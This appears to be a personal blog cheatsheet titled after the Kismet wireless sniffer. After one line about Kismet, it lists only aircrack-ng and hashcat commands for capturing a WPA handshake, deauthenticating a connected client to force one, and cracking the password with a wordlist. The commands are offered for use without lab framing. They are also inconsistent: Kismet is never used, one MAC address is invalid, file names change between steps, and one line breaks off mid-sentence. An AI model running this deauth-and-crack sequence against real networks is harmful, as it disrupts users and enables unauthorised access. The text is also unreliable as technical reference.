Erwin Bierens

Knowledge is Power

Cheatsheet - kismet

2021-03-30 1 min read cheatsheet

Kismet Cheatsheet

Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.

Kismet works with Wi-Fi interfaces, Bluetooth interfaces, some SDR (software defined radio) hardware like the RTLSDR, and other specialized capture hardware.

[+] Commands

Turn Interface down

ifconfig wlan0 down

Set monitor mode

iwconfig wlan0 mode monitor

Set interface up

ifconfig wlan0 up

Start listening for all nearby beacon frames to get target BSSID and

airodump-ng wlan0 --band abg

Set 5 GHz channel

iwconfig wlan0 channel 149

Start listening for the handshake

airodump-ng -c 149 --bssid P4:E4:E4:92:60:71 -w cap01.cap wlan0

Optionally deauth a connected client to force a handshake

aireplay-ng -D -0 2 -a 9C:5C:8E:C9:AB:C0 -c P4:E4:E4:92:60:71 wlan0

Convert cap to hccapx

aircrack-ng -J file.cap capture.hccap

Crack with hashcat:

hashcat -m 2500 captureallthewireless-05.cap rockyou.txt

comments powered by Disqus